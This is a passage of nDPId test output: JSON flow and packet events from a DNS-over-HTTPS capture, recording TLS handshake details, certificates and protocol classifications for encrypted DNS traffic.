bpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"}
00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="}
01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
